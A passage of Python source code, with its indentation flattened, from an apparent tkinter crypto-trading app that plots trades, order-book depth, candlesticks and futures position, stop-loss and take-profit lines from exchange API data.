app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.3f" % (yI0))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.4f" % (yI0))
elif prSt < 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.8f" % (yI0))
yp=-60
ypi=-4
while yp < 1500:
points=[]
yp = 0 + ypi*60
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+ypi*15
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%M:%S")
app.graph_Tb.create_text(0 + ypi*60,10,text=tmm)
app.graph_Td.create_text(0 + ypi*60,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0-ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0-ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0-ypi*(yI0/400)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp)
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0+ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0+ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0+ypi*(yI0/400)))
ypi += 1
for mm in range(len(myTup12[1])):
myDicGr1TT = myTup12[1][mm]
if int(myDicGr1TT['id']) > Lo:
xx=myDicGr1TT['time']
xxp = 20 + ((xx - TT0)/1000)*4
yyp = grMd - ((float(myDicGr1TT['price'])-yI0)/prSt)* grSt
if xxp > 1000:
app.graph_1.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT['quoteQty']) < 100:
x1, y1 = (xxp - 1), (yyp - 1)
x2, y2 = (xxp + 1), (yyp + 1)
elif 100 <= float(myDicGr1TT['quoteQty']) <= 1000:
x1, y1 = (xxp - 2 - 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp -2 - 3*(float(myDicGr1TT['quoteQty'])/1000))
x2, y2 = (xxp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000))
elif 1000 < float(myDicGr1TT['quoteQty']) <= 10000:
x1, y1 = (xxp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000))
x2, y2 = (xxp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000))
elif 10000 < float(myDicGr1TT['quoteQty']) <= 50000:
x1, y1 = (xxp - 8), (yyp - 8)
x2, y2 = (xxp + 8), (yyp + 8)
elif float(myDicGr1TT['quoteQty']) > 50000:
x1, y1 = (xxp - 10), (yyp - 10)
x2, y2 = (xxp + 10), (yyp + 10)
if myDicGr1TT['isBuyerMaker'] == True:
flc = "magenta"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "black"
else:
flc="green"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "gold"
app.graph_1.create_oval(x1, y1, x2, y2, fill=flc)
#print(x1,x2,y1,y2)
Lo=int(myDicGr1TT['id'])
#__Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist5[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=grSt)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=grSt)
#______________Timer for building a Candle chart
class Timer_Candle:
def __init__(self):
global TE_Cnd
global yI
global Lo
global PEP
global PPA
global PSP
global PPP
global y0I_TP
global GPPP_Tmp
global GPSP_Tmp
global GPPP_Tmp_txt
global GPSP_Tmp_txt
global grMd
global grSt
global grFt
global GOS_TP
global GOS_SL
grFt_12 = font.Font(size=12)
grFt_10 = font.Font(size=10)
while True:
if PS1 == True:
sys_msg = ' The candlestick chart ' + grSmb + ' is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = True
break
if should_run_C:
for i in range(400):
if not should_run_C:
sys_msg = ' The candlestick chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_C:
if i==0:
sys_msg = ' The candlestick chart ' + grSmb + ' is running.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
if i==0:
app.Scale_TP.set(0)
app.Scale_SL.set(0)
#print(myTup11[1])
if MS=='SPOT' and i==0:
if GS=='CANDLE 5m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='5m', limit=288))
elif GS=='CANDLE 1m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=288))
elif GS=='CANDLE 15m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='15m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='15m', limit=288))
elif GS=='CANDLE 30m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='30m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='30m', limit=288))
elif GS=='CANDLE 1h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1h', limit=288))
elif GS=='CANDLE 4h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='4h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='4h', limit=288))
elif GS=='CANDLE 1d':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1d', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1d', limit=288))
myDicGr1 = myTupSpK[1] #dict
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
#print (myDicGr1[1][1])
elif MS=='FUTURES' and i==0:
if GS=='CANDLE 5m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='5m', limit=288)) #tupl
elif GS=='CANDLE 1m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=288)) #tupl
elif GS=='CANDLE 15m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='15m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='15m', limit=288)) #tupl
elif GS=='CANDLE 30m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='30m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='30m', limit=288)) #tupl
elif GS=='CANDLE 1h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1h', limit=288)) #tupl
elif GS=='CANDLE 4h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='4h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='4h', limit=288)) #tupl
elif GS=='CANDLE 1d':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1d', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1d', limit=288)) #tupl
my_file_Kl = open(grSmb + "_KL.txt", "w")
my_file_Kl.write(str(myTupFtK))
my_file_Kl.close()
#print(myTup12)
myDicGr1 = myTupFtK[1]
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
if i==0:
PnL_Pos_L = ''
PnL_Pos_S = ''
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
PnL_Pos = 0
app.graph_Cn.delete("all")
app.graph_VV.delete("all")
app.graph_BTCD.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
#print(grZm)
#print (grMd)
TT0 = time.mktime(time.localtime())*1000
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
GAP = app.graph_Cn.create_line(points,fill="blue",width=1,dash=(4,2))
if MS == 'FUTURES':
GPEP_L = app.graph_Cn.create_line((0,0,0,0),fill="#336633",width=1,dash=(20,10))
GPEP_S = app.graph_Cn.create_line((0,0,0,0),fill="black",width=1,dash=(20,10))
GPLP = app.graph_Cn.create_line((0,0,0,0),fill="orange",width=3,dash=(20,10))
GPSP = app.graph_Cn.create_line((0,0,0,0),fill="red",width=3,dash=(20,10))
GPSP_txt = app.graph_Cn.create_text((0,0),text='',fill="red",font=grFt_12)
GPPP = app.graph_Cn.create_line((0,0,0,0),fill="green",width=3,dash=(20,10))
GPPP_txt = app.graph_Cn.create_text((0,0),text='',fill="green",font=grFt_12)
GPPP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#66CDAA",width=1,dash=(50,50))
GPPP_Tmp_txt = app.graph_Cn.create_text((0,0),fill="#36a355",text='')
GPSP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#DC143C",width=1,dash=(50,50))
GPSP_Tmp_txt = app.graph_Cn.create_text((0,0),fill="#DC143C",text='')
GEPt = app.graph_Cn.create_text(0,0,text='',fill="black",font=grFt_12)
GLO_L = []
GLO_L_txt = []
GLO_S = []
GLO_S_txt = []
for j in range (100):
GLO_L_L = app.graph_Cn.create_line((0,0,0,0),fill="#336633",width=1)
GLO_L.append(GLO_L_L)
GLO_L_L_txt = app.graph_Cn.create_text((0,0),fill="#336633",text='')
GLO_L_txt.append(GLO_L_L_txt)
GLO_S_S = app.graph_Cn.create_line((0,0,0,0),fill="#DC143C",width=1)
GLO_S.append(GLO_S_S)
GLO_S_S_txt = app.graph_Cn.create_text((0,0),fill="#DC143C",text='')
GLO_S_txt.append(GLO_S_S_txt)
GOS_TP = app.graph_Cn.create_rectangle((0,0,0,0),fill="#66CDAA")
GOS_SL = app.graph_Cn.create_rectangle((0,0,0,0),fill="pink")
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue",font=grFt_10)
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue",font=grFt_10)
elif prSt < 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue",font=grFt_10)
yp=1180
ypi=0
while yp > -500:
points=[]
if GS=='CANDLE 5m':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1m':
yp_s = 10*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 15m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 30m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 4h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1d':
yp_s = 14*4
yp = 1180 - ypi*yp_s
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
if GS=='CANDLE 5m':
tm=TT0/1000+36000-ypi*3600
elif GS=='CANDLE 1m':
tm=TT0/1000+7200-ypi*600
elif GS=='CANDLE 15m':
tm=TT0/1000+108000-ypi*7200
elif GS=='CANDLE 30m':
tm=TT0/1000+216000-ypi*14400
elif GS=='CANDLE 1h':
tm=TT0/1000+432000-ypi*43200
elif GS=='CANDLE 4h':
tm=TT0/1000+1728000-ypi*172800
elif GS=='CANDLE 1d':
tm=TT0/1000+10368000-ypi*1209600
tm1 = datetime.datetime.fromtimestamp(tm)
if GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h':
tmm=tm1.strftime("%H:%M")
elif GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
tmm=tm1.strftime("%d.%m")
app.graph_Tb.create_text(1180 - ypi*yp_s,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*yp_s,10,text=tmm)
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1)):
myDicGr1TT = myDicGr1[mm]
myDicGr1BTCD = myDicBTCD[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
if GS=='CANDLE 5m':
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*4
elif GS=='CANDLE 1m':
xxp = 700 + ((((xx - TT0)/1000)+30)/60)*4
elif GS=='CANDLE 15m':
xxp = 700 + ((((xx - TT0)/1000)+450)/900)*4
elif GS=='CANDLE 30m':
xxp = 700 + ((((xx - TT0)/1000)+900)/1800)*4
elif GS=='CANDLE 1h':
xxp = 700 + ((((xx - TT0)/1000)+1800)/3600)*4
elif GS=='CANDLE 4h':
xxp = 700 + ((((xx - TT0)/1000)+7200)/14400)*4
elif GS=='CANDLE 1d':
xxp = 700 + ((((xx - TT0)/1000)+43200)/86400)*4
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
if mm == 0:
yypVMax = 0
yypTMax = 0
for nm in range(len(myDicGr1)):
if float(myDicGr1[nm][5])>yypVMax:
#print(myDicGr1[nm][5])
yypVMax = float(myDicGr1[nm][5])
if float(myDicGr1[nm][8])>yypTMax:
#print(myDicGr1[nm][5])
yypTMax = float(myDicGr1[nm][8])
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
app.graph_BTCD.create_line(-100,50,1000,50,fill='black',dash=(1,1))
else:
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
if float(myDicGr1BTCD[1]) < float(myDicGr1BTCD[4]):
app.graph_BTCD.create_line(xxp,50,xxp,50-((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='green')
else:
app.graph_BTCD.create_line(xxp,50,xxp,50+((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='red')
if xxp > 1000:
app.graph_Cn.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Cn.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
app.graph_VV.create_line(xxp,100,xxp,yyp5,fill=flc)
app.graph_VV.create_line(xxp+1,0,xxp+1,yyp6,fill='black')
if MS == 'FUTURES':
BnFAcc=bot.userPositionInfo()
if len(BnFAcc)>0:
sTmp=''
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if str(BnFAcc1['symbol'])==grSmb and float(BnFAcc1['positionAmt']) != 0:
y_liq = float(BnFAcc1['liquidationPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
app.graph_Cn.coords(GPLP, -500,y_liq,800,y_liq)
y_liq = float(BnFAcc1['entryPrice'])
PEP=float(BnFAcc1['entryPrice'])
PPA = float(BnFAcc1['positionAmt'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
#print (BnFAcc1['positionSide'])
if str(BnFAcc1['positionSide'])=='LONG':
app.graph_Cn.coords(GPEP_L, -500,y_liq,800,y_liq)
PnL_Pos_L = BnFAcc1['unRealizedProfit']
if str(BnFAcc1['positionSide'])=='SHORT':
#print (BnFAcc1['positionSide'])
app.graph_Cn.coords(GPEP_S, -500,y_liq,800,y_liq)
PnL_Pos_S = BnFAcc1['unRealizedProfit']
app.graph_Cn.coords(GEPt, 105, y_liq)
app.graph_Cn.itemconfigure(GEPt,text='Position: ' + str(BnFAcc1['positionSide']) + ' Price: '+ str(float(BnFAcc1['entryPrice']))+'\n'+'Amt: ' + str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))+ ' USDT')
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
TO_Tpl_Tmp=[]
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
TO_It.append('-')
TO_Tpl_Tmp.append(TO_It)
#print(TO_Tpl_Tmp)
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
PnL_dif = -(PEP * PPA - float(BnFAcc1['stopPrice']) * PPA)
app.graph_Cn.coords(GPSP, -500,y_liq,800,y_liq)
app.graph_Cn.coords(GPSP_txt, 600,y_liq)
app.graph_Cn.itemconfigure(GPSP_txt,text=('Stop-Loss. Price: '+ str(BnFAcc1['stopPrice']) + '\n') + "%.2f" % (PnL_dif) + ' USDT')
PSP = float(BnFAcc1['stopPrice'])
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_SL.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_TP.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if y_liq > 1000:
Ltmp = app.graph_Cn.configure()
#print(Ltmp['scrollregion'][4])
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],Ltmp1[1],Ltmp1[2],y_liq+200))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
PPP=y_liq
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_TP.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_SL.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
PnL_dif = -(PEP * PPA - float(BnFAcc1['stopPrice']) * PPA)
app.graph_Cn.coords(GPPP, -500,y_liq,800,y_liq)
app.graph_Cn.coords(GPPP_txt,600,y_liq)
app.graph_Cn.itemconfigure(GPPP_txt,text=('Take-profit. Price: '+ str(BnFAcc1['stopPrice']) + '\n') + "%.2f" % (PnL_dif) + ' USDT')
if y_liq < -500:
Ltmp = app.graph_Cn.configure()
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],y_liq-200,Ltmp1[2],Ltmp1[3]))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='LIMIT' and str(BnFAcc1['type'])=='LIMIT':
#print(BnFAcc1)
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
lo = TO_CC+1
TO_SCh = True
if TO_CC > 0:
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
#print(TO_It[0],TO_It[1],TO_It[2],TO_It[3])
if TO_It[0] == str(BnFAcc1['positionSide']) and TO_It[1] == str(BnFAcc1['side']) and float(TO_It[2]) == float(BnFAcc1['price']) and float(TO_It[3]) == float(BnFAcc1['origQty']):
app.Tree_Ord.item(nm, values=(str(BnFAcc1['positionSide']),str(BnFAcc1['side']),str(BnFAcc1['price']),str(BnFAcc1['origQty']),
str(BnFAcc1['origType'])))
TO_Tpl_Tmp[nm-1][5]='+'
TO_SCh = False
#print(TO_It[0],TO_It[1],TO_It[2],TO_It[3])
if TO_SCh == True and float(BnFAcc1['price']) != 0:
#print(TP_It)
#print(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']))
app.Tree_Ord.insert(parent='',index='end',iid=lo,text='',values=(str(BnFAcc1['positionSide']),str(BnFAcc1['side']),str(BnFAcc1['price']),str(BnFAcc1['origQty']),
str(BnFAcc1['origType'])))
lo +=1
#print(TO_Tpl_Tmp)
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
TO_Tpl_Tmp2=[]
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
TO_Tpl_Tmp2.append(app.Tree_Ord.item(nm)["values"])
#print(TO_Tpl_Tmp)
#print(TO_Tpl_Tmp2)
for nm in range(1,TO_CC+1):
if nm-1 <= len(TO_Tpl_Tmp)-1 and len(TO_Tpl_Tmp)>0 :
if TO_Tpl_Tmp[nm-1][5] == '-' or TO_Tpl_Tmp[nm-1][5] == '':
TO_Tpl_Tmp2[nm-1][2] = '0'
TO_Tpl_Tmp2[nm-1][3] = '0'
kk=0
nm_d=False
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
if float(TO_Tpl_Tmp2[nm-1][2]) == 0 and float(TO_Tpl_Tmp2[nm-1][3]) == 0 and kk<=len(TO_Tpl_Tmp2):
nm_d=True
km=False
for mn in range(kk,len(TO_Tpl_Tmp2)):
#print(mm)
if float(TO_Tpl_Tmp2[mn][2])!=0 and float(TO_Tpl_Tmp2[mn][3])!=0 and km==False:
app.Tree_Ord.item(nm, values=(TO_Tpl_Tmp2[mn][0],TO_Tpl_Tmp2[mn][1],TO_Tpl_Tmp2[mn][2],TO_Tpl_Tmp2[mn][3],TO_Tpl_Tmp2[mn][4],TO_Tpl_Tmp2[mn][5]))
kk=mn+1
#print(nn,kk,mm)
km=True
if nm_d==True and km==False:
kk=len(TO_Tpl_Tmp2)+1
else:
#print(nn,kk)
if nm_d==True and kk<TO_CC:
app.Tree_Ord.item(nm, values=(TO_Tpl_Tmp2[kk][0],TO_Tpl_Tmp2[kk][1],TO_Tpl_Tmp2[kk][2],TO_Tpl_Tmp2[kk][3],TO_Tpl_Tmp2[kk][4],TO_Tpl_Tmp2[kk][5]))
if TO_Tpl_Tmp2[kk][0] == 'LONG':
app.Tree_Ord.item(nm,tags=('long'))
elif TO_Tpl_Tmp2[kk][0] == 'SHORT':
app.Tree_Ord.item(nm,tags=('short'))
app.Tree_Ord.tag_configure('long', background='#d6f8d6')
